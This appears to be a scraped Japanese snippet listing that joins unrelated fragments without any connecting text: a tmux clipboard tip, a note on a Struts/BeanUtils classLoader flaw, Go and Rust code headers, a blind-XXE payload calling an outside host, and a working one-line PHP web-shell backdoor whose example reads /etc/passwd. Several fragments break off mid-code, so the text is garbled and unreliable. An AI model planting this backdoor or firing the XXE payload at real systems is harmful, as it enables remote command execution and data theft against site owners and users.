blacknon

リモートのtmuxのコピーモードとクリップボードを共有する

という状況でtmuxのコピーモードでコピーしてきたものをMacで扱いたい。

C-b zでズームしてからoptionキー押しながらマウスでコピーでもいいんだけど(iTerm2のみ？、ズームしないと複数行コピーするときに隣のペインも選択してしまう)、キーボードだけでやりたい。そこでxselを使う。

	今回の問題は、StrutsでHttpリクエストパラメータをFormに入れる際に、commons-beanutilsの
	BeanUtils.populateを使っていることに起因する。

	populateの中で使われている、BeanUtils.setPropertyはノーチェックでBeanのプロパティを探すので、
	プロパティ名を"class.classLoader.xxx"のように書いておくと、BeanのgetClassをよんで、
	ClassオブジェクトのgetClassLoaderをよんで、…と連鎖してクラスローダが取得される。

	そしてドットでつないだ最後のプロパティ名で値をセットにいくので、TomcatのWebAppClassLoaderが
	途中でゲットされてしまうと、Struts2の脆弱性と同じ問題が発生してしまう。

	/**
	* Goから Pythonの関数を呼び出す実験
	* 適当な文字列を返してくる手頃な関数 platform.platform() を呼んでみる。
	* http://docs.python.jp/2/library/platform.html
	*
	* Cから Pythonを呼び出す方法
	* http://docs.python.jp/2/extending/embedding.html
	* が基本となる。Go -> C -> Pythonという呼び出しフローになるのでやや煩雑
	*/
	package main

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
	<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
	<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

	/// Given a vector containing a partial Cartesian product, and a list of items,
	/// return a vector adding the list of items to the partial Cartesian product.
	///
	/// # Example
	///
	/// ```
	/// let partial_product = vec![vec![1, 4], vec![1, 5], vec![2, 4], vec![2, 5]];
	/// let items = &[6, 7];
	/// let next_product = partial_cartesian(partial_product, items);
	/// assert_eq!(next_product, vec![vec![1, 4, 6],

	/*
	Simple HTTP proxy in Rust. Hard coded to proxy rust-lang.org.
	*/

	extern crate hyper;

	use std::io::Read;

	use hyper::Client;
	use hyper::header::Connection;